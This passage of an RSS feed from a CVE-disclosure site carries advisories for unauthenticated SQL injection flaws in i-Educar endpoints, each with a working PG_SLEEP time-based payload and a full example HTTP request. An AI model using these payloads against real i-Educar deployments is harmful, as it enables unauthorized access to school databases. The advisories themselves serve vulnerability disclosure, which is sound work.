&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;This payload introduces a time delay, demonstrating the ability to execute arbitrary SQL queries.&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;normal-request&amp;#34;&amp;gt;Normal request:
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10844/image.png&amp;#34;
	width=&amp;#34;1041&amp;#34;
	height=&amp;#34;564&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10844/image_hu_6d08bd4f212812a8.png 480w, /p/cve-2025-10844/image_hu_d5ec1ad3473d1422.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;184&amp;#34;
		data-flex-basis=&amp;#34;442px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;sqli-request&amp;#34;&amp;gt;SQLi Request:
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10844/image-1.png&amp;#34;
	width=&amp;#34;1043&amp;#34;
	height=&amp;#34;561&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10844/image-1_hu_f74db5399c68b638.png 480w, /p/cve-2025-10844/image-1_hu_69ad34c8b657c13.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;185&amp;#34;
		data-flex-basis=&amp;#34;446px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Observe the time delay in the server response, indicating the successful execution of the SQL payload.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Unauthorized access to sensitive data (e.g., users, passwords, logs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Database enumeration (schemas, tables, users, versions).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Full compromise of the application if chained with other vulnerabilities.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-10844.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-10844.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Tue, 23 Sep 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-10845</title>
        <link>https://www.cvehunters.com/p/cve-2025-10845/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-10845/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-10845-sql-injection-blind-time-based-vulnerability-in-id-parameter-on-modulecomponentecurricularview-endpoint&amp;#34;&amp;gt;CVE-2025-10845: SQL Injection (Blind Time-Based) Vulnerability in &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; Parameter on &amp;lt;code&amp;gt;module/ComponenteCurricular/view&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10845&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10845&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was discovered in the &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; parameter of the &amp;lt;code&amp;gt;module/ComponenteCurricular/view&amp;lt;/code&amp;gt; endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly sanitize user-supplied input in the &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-10845-sql-injection-blind-time-based-vulnerability-in-id-parameter-on-modulecomponentecurricularview-endpoint&amp;#34;&amp;gt;CVE-2025-10845: SQL Injection (Blind Time-Based) Vulnerability in &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; Parameter on &amp;lt;code&amp;gt;module/ComponenteCurricular/view&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10845&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10845&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was discovered in the &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; parameter of the &amp;lt;code&amp;gt;module/ComponenteCurricular/view&amp;lt;/code&amp;gt; endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly sanitize user-supplied input in the &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;module/ComponenteCurricular/view&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;#39; AND 6606=(SELECT 6606 FROM PG_SLEEP(5)) AND &amp;amp;#39;QDaZ&amp;amp;#39;=&amp;amp;#39;QDaZ
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h4 id=&amp;#34;example-request&amp;#34;&amp;gt;Example Request
&amp;lt;/h4&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;15
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;16
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;17
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;18
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;19
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;GET /module/ComponenteCurricular/view?id=8%27%20AND%206606=(SELECT%206606%20FROM%20PG_SLEEP(5))%20AND%20%27QDaZ%27=%27QDaZ HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: localhost:8086
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;sec-ch-ua: &amp;amp;#34;Not)A;Brand&amp;amp;#34;;v=&amp;amp;#34;8&amp;amp;#34;, &amp;amp;#34;Chromium&amp;amp;#34;;v=&amp;amp;#34;138&amp;amp;#34;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;sec-ch-ua-mobile: ?0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;sec-ch-ua-platform: &amp;amp;#34;Linux&amp;amp;#34;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: pt-BR,pt;q=0.9
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Upgrade-Insecure-Requests: 1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko)
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Chrome/138.0.0.0 Safari/537.36
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept:
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;text/html,application/xhtml&#43;xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;q=0.8,application/signed-exchange;v=b3;q=0.7
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: none
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: navigate
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-User: ?1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: document
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: i_educar_session=bnTu3HZ4Jk5a0JxRERNMd03ZAr1TUGvXZTDs9DdE
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;This payload introduces a time delay, demonstrating the ability to execute arbitrary SQL queries.&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;normal-request&amp;#34;&amp;gt;Normal request:
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10845/image.png&amp;#34;
	width=&amp;#34;1040&amp;#34;
	height=&amp;#34;561&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10845/image_hu_1f049ffa2d1e5806.png 480w, /p/cve-2025-10845/image_hu_818dd237a2bfb1a8.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;185&amp;#34;
		data-flex-basis=&amp;#34;444px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;sqli-request&amp;#34;&amp;gt;SQLi Request:
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10845/image-1.png&amp;#34;
	width=&amp;#34;1042&amp;#34;
	height=&amp;#34;562&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10845/image-1_hu_87ce56b58b014bee.png 480w, /p/cve-2025-10845/image-1_hu_1763c7a45ffeff1f.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;185&amp;#34;
		data-flex-basis=&amp;#34;444px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Observe the time delay in the server response, indicating the successful execution of the SQL payload.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Unauthorized access to sensitive data (e.g., users, passwords, logs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Database enumeration (schemas, tables, users, versions).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Full compromise of the application if chained with other vulnerabilities.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-10845.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-10845.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Tue, 23 Sep 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-10846</title>
        <link>https://www.cvehunters.com/p/cve-2025-10846/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-10846/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-10846-sql-injection-boolean-based-vulnerability-in-id-parameter-on-modulecomponentecurricularedit-endpoint&amp;#34;&amp;gt;CVE-2025-10846: SQL Injection (Boolean-Based) Vulnerability in &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; Parameter on &amp;lt;code&amp;gt;module/ComponenteCurricular/edit&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10846&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10846&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was discovered in the &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; parameter of the &amp;lt;code&amp;gt;module/ComponenteCurricular/edit&amp;lt;/code&amp;gt; endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly sanitize user-supplied input in the &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-10846-sql-injection-boolean-based-vulnerability-in-id-parameter-on-modulecomponentecurricularedit-endpoint&amp;#34;&amp;gt;CVE-2025-10846: SQL Injection (Boolean-Based) Vulnerability in &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; Parameter on &amp;lt;code&amp;gt;module/ComponenteCurricular/edit&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10846&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10846&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was discovered in the &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; parameter of the &amp;lt;code&amp;gt;module/ComponenteCurricular/edit&amp;lt;/code&amp;gt; endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly sanitize user-supplied input in the &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;module/ComponenteCurricular/edit&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
